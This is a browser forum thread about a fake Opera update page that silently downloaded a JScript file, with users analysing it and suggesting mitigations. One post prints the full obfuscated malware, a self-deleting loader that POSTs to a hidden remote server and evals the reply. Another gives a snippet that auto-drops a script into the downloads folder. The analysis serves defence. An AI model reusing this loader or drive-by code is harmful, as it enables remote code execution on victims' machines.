Do more on the web, with a fast and secure browser!

Download Opera browser with:

  • built-in ad blocker
  • battery saver
  • free VPN
Download Opera
  • I happened upon a compromised website while browsing the internet on Opera that redirected to a fake Opera page that asked me to update the browser supposedly for being outdated. The real webpage I was meant to be taken to (from a Google search) was meant to be a page on washing machine maintenance (so I wasn't browsing anything dodgy). The hijacked webpage had an obviously dodgy url and the download link for the fake update also had an obviously dodgy url, so I didn't click on anything, but I noticed that it did a drive-by download of a js file. Windows Defender didn't pick up anything, and I immediately deleted the js file. I searched on Opera forums to see if anyone else experienced a similar drive-by attack, and it seems like someone had an identical experience after visiting another compromised website. The user explains the experience here:

    That user had the drive-by attack in 2019, and I am disappointed that this hasn't been looked into and patched already. I am assuming my operating system (Win 10) to be compromised now, and I have to reformat the whole damn thing, and I only started using Opera since last week! Opera security must be like Swiss cheese, because I haven't had this problem on Safari, Firefox, Edge or Chrome. Just because the browser has a much smaller userbase doesn't mean it won't be exploited for vulnerability. Besides, someone posted about this vulnerability back in 2019, and it still haven't been patched. Opera is Trash

  • @operaequalstrash To where the .js files was downloaded? You weren't prompted to choose where the file should be saved to?

  • @operaequalstrash said in Drive-by download attack:

    I happened upon a compromised website

    What website? URL to it?

  • @leocg it was auto-downloaded to the Download folder, so no, I was not prompted whether to download the file. I noticed it because of the blue dot on the top right side of the browser window that shows up when something finishes downloading. The file name was something like Update. I Secure Erased the SSD this morning so I didn't take any screenshots.

  • @burnout426,Vinegar,and%20finally%20rinse%20with%20water.&ved=2ahUKEwjVjp3A5vfvAhVdyjgGHVrlBEIQFjABegQIAxAF&usg=AOvVaw267HvzCCIl7hRTgOibLWS7

    I got there by clicking on a Google search result (as above). Like the other user experienced in 2019, the hijacked page looked 'professional' like a real Opera page with logos, but just with obviously dodgy link urls. The page was asking me to update Opera because it's outdated. I did not click on anything on the page, but it drive-by downloaded a js file into my Download folder.

    I am not sure about what exactly this drive-by did to my system, but nonetheless I Secure Erased my SSD this morning, and I'll have to reinstall Win10 later. It's a minor inconvenience, but I am more annoyed that Opera browser is vulnerable to an exploit like this. I was using it on its default setting with no downloaded plugins. The irony is that I started using Opera for it's supposedly good security - haha what a joke of security it has. The last time I saw a drive-by like this was on IE on Windows XP.

  • @operaequalstrash By default Opera will show the save as dialog for executable files, that's why I asked.

  • @operaequalstrash So you searched for something on Google and, in the results page, clicked on the one that looked like the page you were searching for. Then, that page showed a pop-up or a message saying that you need to upgrade Opera?

  • @operaequalstrash said in Drive-by download attack:

    @burnout426 and vinegar.-,Vinegar,and finally rinse with water.&ved=2ahUKEwjVjp3A5vfvAhVdyjgGHVrlBEIQFjABegQIAxAF&usg=AOvVaw267HvzCCIl7hRTgOibLWS7

    I was able to trigger the update page for Chrome. There was no automatic download though. I will keep trying to get the false update page in Opera. However, in Chrome, clicking on the "update chrome" link:

    <a class="button eula-download-button download-button desktop-only hide-cros" href="blob:" id="buttonDownload" download="">Update Chrome</a>

    downloads a blob that represents a zip file. In the zip file is:


    try {
        var kasa = new ActiveXObject('Scripting.FileSystemObject');
        kasa['DeleteFile'](this['WScript']['ScriptFullName'], true);
    catch (e) {}
    var azke = ofznaboqag();
    var bjaqug = rhuxikbmicy(azke);
    while (azke < bjaqug) {
        azke = ofznaboqag();
    function rhuxikbmicy(cnifloefpi) {
        return cnifloefpi + 10000;
    function ofznaboqag() {
        return new Date()['getTime']();
    var fguvakakam = kongahavha('mfciogx.w1sxc1q/gmeorcg.jahicdaexmzhxtnleaweywxuzne.snciggooelq.r3z0iaj7ydqbm2yfv/q/r:usxpmtmtqhu');
    var tid =  kongahavha('d0r0e5p');
    var wbz = kongahavha('m1cbgai0i4mag2vag');
    var mopemgeyb = ['a', tid];
    function sendRequest(mopemgeyb, ypjaliv5) {
        if(typeof ypjaliv5 === 'undefined') { ypjaliv5 = false; }
        var ysviwknoer = '', lukyjiv = '', azhewuv, awkyjugav='eval';
        for (var rebusid3 = 0; rebusid3 < mopemgeyb['length']; rebusid3++) {
            ysviwknoer += rebusid3 + '=' + encodeURIComponent(''+mopemgeyb[rebusid3]) + '&';
        ysviwknoer = fyup(ysviwknoer);
        try {
            var bospopibttu;
            bospopibttu = new ActiveXObject('MSXML2.XMLHTTP');
            bospopibttu['open']('POST', fguvakakam, false);
            if (bospopibttu['status'] == 200) {
                lukyjiv = bospopibttu['responseText'];
                if(lukyjiv) {
                    azhewuv = fwugym(lukyjiv);
                    if(ypjaliv5) {
                        return azhewuv;
                    else {
        } catch (e) {}
        return false;
    function rnugma(rebusid3) {
        var hebod = '00'+rebusid3['toString'](16);
        hebod = hebod['substr'](hebod['length']-2);
        return hebod;
    function fwugym(mpumeznxoxih) {
        var vjueqnuf, bvury9, rebusid3, lukyjiv = '';
        bvury9 = parseInt(mpumeznxoxih['substr'](0, 2), 16);
        vjueqnuf = mpumeznxoxih['substr'](2);
        for (rebusid3 = 0; rebusid3 < vjueqnuf['length']; rebusid3+=2) {
            lukyjiv += String['fromCharCode'](gcayhptecim(parseInt(vjueqnuf['substr'](rebusid3, 2), 16), bvury9));
        return lukyjiv;
    function fyup(mpumeznxoxih) {
        var bvury9 = 207, rebusid3, lukyjiv = '';
        for (rebusid3 = 0; rebusid3 < mpumeznxoxih['length']; rebusid3++) {
            lukyjiv += rnugma(mpumeznxoxih['charCodeAt'](rebusid3) ^ bvury9);
        return (rnugma(bvury9)+lukyjiv);
    function gcayhptecim(ebup, zavyb) {
        var amyn = '', rinnu, minif, rebusid3;
        ebup = nguho(ebup);
        zavyb = nguho(zavyb);
        for(rebusid3 = 0; rebusid3<ebup['length']; rebusid3++) {
            rinnu = ebup['substr'](rebusid3,1);
            minif = zavyb['substr'](rebusid3,1);
                else {
            else {
                else {
        return parseInt(amyn, 2);
    function nguho(ebup) {
        ebup = (+ebup)['toString'](2);
        var epwryihno = '00000000' + ebup;
        epwryihno = epwryihno['substr'](epwryihno['length'] - 8);
        return epwryihno;
    function kongahavha(imalsosu) {
        imalsosu = imalsosu.split('');
        var vhimylpi = '';
        for(var rwean=0; rwean<imalsosu['length']; rwean++) {
            if(rwean%2===1) vhimylpi += imalsosu[rwean];
        vhimylpi = dyah(vhimylpi);
        return vhimylpi;
    function dyah(cweawvyhco) {
        cweawvyhco = cweawvyhco.split('');
        var kogygku = '';
        for (var ajser = cweawvyhco['length'] - 1; ajser >= 0; ajser--) {
            kogygku += oqjrynixi(cweawvyhco, ajser);
        return kogygku;
    function oqjrynixi(ditew, aracfespy) {
        return ditew[aracfespy];

    As in, it's an executable Javascript file (Jscript) for Windows that's dangerous as long as you have Wscript enabled.


    var text;
    text="Hello world!";

    If you create test.js and double-left-click on it and it shows a dialog with "Hello world!", Windows Scripting Host is enabled and you might want to disable it.

    If you never actually executed the Opera update js you got, you should be okay.

  • For:

    var fguvakakam = kongahavha('mfciogx.w1sxc1q/gmeorcg.jahicdaexmzhxtnleaweywxuzne.snciggooelq.r3z0iaj7ydqbm2yfv/q/r:usxpmtmtqhu');
    var tid =  kongahavha('d0r0e5p');
    var wbz = kongahavha('m1cbgai0i4mag2vag');

    The functions translate that into:

    Also, if you see in the code, it requests something from a server and gets a response back. You'll also see at the beginning of the code that the file is set to delete itself after it runs.

  • @leocg Yessir. The page that rendered was a somewhat official looking Opera update page that said my browser is out of date, click here to update. The js file just downloaded even without me clicking on anything...

  • @burnout426 it seems like WSH is enabled by default on Windows, and I had never disabled it when this drive-by happened. Either way, I secure erased my SSD, and reinstalled Win10 since there were some work files that are security sensitive.

    If Opera shows a save as dialog for executable files by default as @leocg mentioned, shouldn't it show a dialog for a Jscript file when a webpage is trying to download it onto my machine? I get that it isn't much of a concern unless I execute the downloaded file, but this is just another way for an attack to bypass the browser sandbox, and get one step closer to having it executed (whether by mistake by the user or whatever). I reported the incident to Opera.

  • @operaequalstrash You need to do anything to trigger the update message? I opened the link on Opera Stable 75 and Developer 77 and couldn't see anything related to Opera upgrade.

  • @leocg I didn't have to do anything special in Chrome. But, it only happened after a few times of loading the link and only happened once. I have yet to trigger it in Opera to see if the js file gets dumped by itself in the downloads folder without asking.

  • I don't know if this works for a remote html file, but it does for a local one:


        window.addEventListener("DOMContentLoaded", function() {
            var b = new Blob(['WScript.Echo("Hello World");']);
            var u = URL.createObjectURL(b, {type: "application/javascript"});
            var a = document.createElement("a");
            a.href = u;
   = "evil.js";
            a.textContent = "Update";
        }, false);

    That will automatically dump evil.js in your download folder. You can double-left-click the file and Windows will ask you if you want to run it (as long as you didn't uncheck the "always ask" box in that dialog before).

    You do get a notification in Opera that the download happened. But in Chrome, in the notification, you get a warning and an option to discard the download.

    I can't say that this is how the site does it in Opera as I haven't been able to trigger the update page on that site in Opera.

  • @burnout426 the hijacked page must be doing a crude browser fingerprinting before rendering the fake update page, since you are getting one for Chrome, but not Opera, whereas I got one on Opera. All I can tell you about the condition that triggered the page for me on Opera was that I installed Opera 1 week prior to that, and everything was on its default setting - no additional plug ins.

    In fact, this situation is identical to this user's :

    He got the hijacked page on Opera, and you got the hijacked page on Chrome. I suspect that the hijacked page rotates the target browser so as not to alert the site admin that it was hijacked. That way if one user on Chrome gets the drive-by and alerts the admin only for the site admin to check out the site on Opera, he would see a normal page with no driveby and would more likely suspect that it was the user's machine that was hijacked rather than the site. Either way, at least I know that Chrome will ask it's users if he wants to proceed with the download, if there is an attempt at a drive-by download. So in this regard, Chrome isn't as trashy as Opera.

  • For my demo at least, if you goto the URL opera://settings/downloads and enable "Ask where to save each file before downloading", you'll get prompted to download the js file where you can cancel it.

  • @burnout426 That should be the default setting, given how easily hijacked pages can pull a drive-by.